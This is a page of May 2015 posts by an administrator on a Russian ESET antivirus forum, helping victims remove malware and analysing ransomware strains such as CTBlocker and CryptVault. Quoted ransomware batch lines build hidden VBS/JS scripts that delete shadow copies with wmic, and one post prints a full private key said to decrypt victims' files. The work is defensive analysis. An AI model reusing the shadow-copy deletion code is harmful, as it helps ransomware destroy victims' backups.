Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше.

На данный момент приобретение лицензий ESET через наш сайт недоступно.
В качестве альтернативы предлагаем антивирусные решения PRO32 — надёжную защиту от киберугроз и высокую производительность для устройств на Windows и Android.

Приглашаем вас присоединиться к новому форуму PRO32.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Добавьте лицензию в корзину и примените промокод при оформлении заказа.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи santy
Выбрать дату в календареВыбрать дату в календаре

Пред. 1 ... 554 555 556 557 558 559 560 561 562 563 564 ... 1784 След.
ничего не понятно
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.05.2015 20:24:19
2.удалите все найденное в малваребайт
перегрузите систему
далее,
3.сделайте проверку в АдвКлинере
http://forum.esetnod32.ru/forum9/topic7084/

*****
4.в АдвКлинере, после завершения проверки,
в секции Папки снимите галки с записей mail.ru, yandex (если есть такие)
остальное удалите по кнопке Очистить
далее,

5.сделайте проверку в FRST
http://www.cyberforum.ru/viruses-faq/thread1362245.html
[ Как создать образ автозапуска? ]
Перейти
ничего не понятно
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.05.2015 19:03:38
добавьте логи сканирования в мбам,
дальше видно будет что делать
[ Как создать образ автозапуска? ]
Перейти
Давайте думать вместе.
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.05.2015 18:25:45
Цитата
Андрей Савченко написал:
Ключ формируется на локальном компьютере или на сервере злоумышленников?
тут вопрос конечно.
вполне возможно, что ключевая пара создается на сервере злоумышленников.
(в этом случае отпадает необходимость в затирании ключей на компе жертвы)
предполагаю, что вот эта инфо в readme.txt, которую они запрашивают, является идентификатором ключа

Цитата
Чтобы расшифровать их, Вам необходимо отправить код:
7A3C33E992454A60C54F|25|2|12
или
Цитата
Чтобы расшифровать их, Вам необходимо отправить код:
22F2A3C82C93E5EEC374|0
или
Цитата
Чтобы расшифровать их, Вам необходимо отправить код:
4C2674EF43B70B21C3A7|0
или
Цитата
595B0DA54E6909123123|65|1|1

пример приватного ключа для расшифровки документов

Цитата
-----BEGIN PRIVATE KEY-----
MIIG/QIBADANBgkqhkiG9w0BAQEFAASCBucwggbjAgEAAoIBgQDEIKfIEM1T­c3Ta
8GrsF14R7RU2cV4qURV8c6sAiaV3aA5r/peJCLmBcNCOoU9bsYjJfW1MxLfm­HtKV
9Ba9khSJ2Q72wRPl+3mE7vA6RlqQBPWDtl7gZQvOpHX2d81BkhQEUZzhLHCG­CYER
Nu5+Xo3932A9vp+6jT8Y7aqvnzu572saAyNsiQSBRwRUKCKmxD57+S23SHdp­7Ds1
CSVVvIjZWcrfDXCXQVY2ico3cZgzNsWIe0ys6X9CEv4fNjDn0iRhbG7BHp0p­WxOP
Fn2KRxApGzkYJHTNRPA4VaeryaoxvR+ajgq9shLiAAp+IJUAPWR2ke9Sg04k­arAM
Q08tZYo3LZrovDQOtebeznH9qWukZKnMq1eY9A06Gpr4+WwBXV7XEQt1+tSv­hfwu
L8WZUyJ6TA6DaGAwJMaF+Bgtgw1aP3QN6ZXZ2xl5rb+qZoN0JyEni7ZX/Yj4­yCBO
VO/PLTm7fg3jADeqXt7zfVkAFgjIoolZjLjajM/qhxKyiJPPuXMCAwEAAQKC­AYBw
mPLaWFMY+ur2mxo3ir7V+c+43uMZ1k1Ikrt05pFZeSL2e0aSRLEDkDob+J4v­3T/T
ta+faDzP35g0wNqhYRFrhnMh1P1QhsxgNjEys5tgnYg6YuQbXcemjiKvKl5r­q6rU
Q+qWF8ZOHXy83lWTtUM9ohWFvT/EgTzdWe0pQHiwqbRKTczzjcJJWfUxP42N­QpNA
53CIjhEIfbgMHcESdNf4OKXQ4s1l+Pu++eJfbFbd6C8FyQvfJXqK+45ratgu­7yQ0
MLtG06OCmPU+olAD3kTokmgNkFujEP2XkQW3qyzru6wtUZH6iH3zMk07aYk4­he6n
G1czArLuMz8ynArBjMeUV9mVaPmro9ykb7Zv0W0jgr/UHXtKf98KZC48BieY­X4zc
1lPJCG3el2hz5fYd8mvVtIQQn6CKiujQBlhuRoty3BwwsX/8AMOnl6v97J+Q­/s0Z
w8+88K+Cy3/4EGRStPIfvXMaXDH7KcXQz7Z9Z9LXanESCYv2sgfWTL+VAvbr­uAkC
gcEA67ayazT2Q/H0FkwaiuOeUAOET8Hkjf+wR1e/pA3LN+ptP5y6nTeMhJ67­aFIM
IPy1dxqQiR1m4+8nd0HgYKhjfy8WlNFblhTdoZ0PgCeNkbHVZJwfDmjVZGPH­+QQP
IdzmYEkC2O2DKbyrAptPtssHP153//IJQTO7ogZPRd/Zbar+Y5f6ge0Qt4Si­r6my
AzEPkRThBG00QMiRYN+xCaeSG/LAzd3vw3Msvmuq6epVT8v9f143IuDc0rSc­unqP
jBN9AoHBANUByZe/p8rrZmLBZqnqMv5uROC2mR+bdyUnX+6iezdon4dXIfRN­zkc5
gLAtXUPSRG1DJAnoSB71Rkj0r7ukw87vMCItKds3FtvMWKzgqTFg5M/TL8Ak­/4Xz
E3kYDxRY8BNQBwoQZP7XTkbFy8yo9R7FUtHYpjZW7EsXgoGuEFmjIPGC0MBY­c23N
c+V1EtSFfUHKB27DZEvuM/RVmOPDlDopLNHAgxZkzqaahQ7JR5tW00p2sm6v­czP8
lAtR5oazrwKBwQCUbwpQBJwIEXd6Cxaz2763+F77ssfwu9EQPCvMbXtJjPCb­HGFP
28k7QpIVkYVdyIWlqS7XiZJfexzJNszLUX7GeqqnsGcSTbV7rmIye7Xkx63v­m3jb
JB0tCMDHCU1WL7tLau7GGFt+jvbJv3AlVhkMSLscjBhT3PYNhBerktli/EkS­AoSY
COd8CaRBJoWZCO4amKFSnkpHeYZDENp1j/asbuQHP/lahU7p4vdQMmbixzyt­VnE2
H5Avh9kifUekGCkCgcBRXW9uIe2sW6MukgXvXeDAw8pXtChlpHMspA/HDhXX­IoXd
ovD7a0Uie9qmcY2wvH8a5Yy8pBf4i2SftafzG4sYXtGaHHpinHaE21f8IY0/­qW19
3YPd98QLnMCRfxkzgo2iMu2dcInDtubVrfSdZuTLLkDmm8VR+H4maQKXGrBw­LRoG
ZxvqfV8KUHK28bORrrQcD1ore0OypXj/GjtetXTHirbuIIVyZmtxxJCTB1vt­AIuR
ZCngkfCFqTO75zsRtU0CgcBKODRX7lBFFiDbbRnjW6R5leHjlrSsu2Q4C8Ck­j/7o
b2ng5HEnERZuZINQfiSfdZu0TRJvAw65le736moe6FJq5zw1fvDVvnN9Ig8y­CPCz
rUg6YuFCTC6WZwap9/p/X8f3UCWRYKAjeh18AcPa3TkSIKAqkuQ4Ar9a280L­Pzl7
3DmgSXw8ZB+lKVGGhd24DhqG649d+YedO7f8+oIzJMtQlm+Iqns5ICe8wDdr­DzQw
PDfEA1Nit7T/yHejsniGrA4=
-----END PRIVATE KEY-----
Изменено: santy - 16.05.2015 19:11:17
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.05.2015 12:45:40
NickM, тестирую в основном на XP, не наблюдал как этот фрагмент отрабатывает на Win7,8
[ Как создать образ автозапуска? ]
Перейти
ничего не понятно
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.05.2015 12:33:10
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
Код

;uVS v3.85.21 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE

delall %SystemDrive%\USERS\КОМПИК\APPDATA\LOCAL\SYSTEMDIR\NETHOST.EXE
;------------------------autoscript---------------------------

chklst
delvir

delref HTTP://ANVIDPA.RU/?UTM_SOURCE=UOUA03&UTM_CONTENT=771B99ED44376525853071176B6BD882

deltmp
delnfr
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/
[ Как создать образ автозапуска? ]
Перейти
зашифровано в CTBlocker
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.05.2015 12:25:38
а лог зачем?  вы же систему поменяли после шифрования
[ Как создать образ автозапуска? ]
Перейти
зашифровано в CTBlocker
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.05.2015 11:08:00
скорее всего это ctblocker, т.е. без расшифровки на сегодня и завтра.
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 15.05.2015 14:11:39
вот скажем в начале апреля был вариант.

Цитата
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"
echo var cdp="%%TEMP%%\\shdw.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\shdw.js"

а это на конец марта

Цитата
echo Set objShell = CreateObject^("Shell.Application"^) > "%TEMP%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%TEMP%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%TEMP%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%TEMP%\win.vbs"
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 15.05.2015 13:49:42
достаточно давно (месяца два не меньше, если не больше). файл сейчас гляну
а что именно по этому файлу прокомментировать? отключение теневых копий? надо сравнить со старыми вариантами бат-энкодера.
немного позже.
Изменено: santy - 04.06.2016 18:04:48
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 15.05.2015 10:29:37
уху, видимо поправили свой бат-энкодер.
теперь процесс шифрования прописан в автозапуск, надо будет посмотреть последние свежие варианты шифратора.
возможно дошифрование того что осталось незашифрованным или восстановленным.
поэтому темп надо зачищать от файлов ВАУЛТ

Цитата
C:\Users\0D88~1\AppData\Local\Temp\06dca008.js
Скрипт: Kарантин, Удалить, Удалить через BC Активен Ключ реестра HKEY_USERS, S-1-5-21-3033825225-2200833762-766671363-1146\Software\Microsoft\Windows\CurrentVersion\Run, ffe7c7a0

этот файлик 06dca008.js
запускает 280ec63e.cmd
в котором прописано шифрование файлов.
т.е. это как раз дошифрование, потому что после перезагрузки cmd уже не меняется.
------
если этот файлик будет удален, то дошифрование, конечно, не произойдет. нечем шифровать.
Цитата
C:\Users\0D88~1\AppData\Local\Temp\svchost.exe
Изменено: santy - 04.06.2016 18:04:48
[ Как создать образ автозапуска? ]
Перейти
Пред. 1 ... 554 555 556 557 558 559 560 561 562 563 564 ... 1784 След.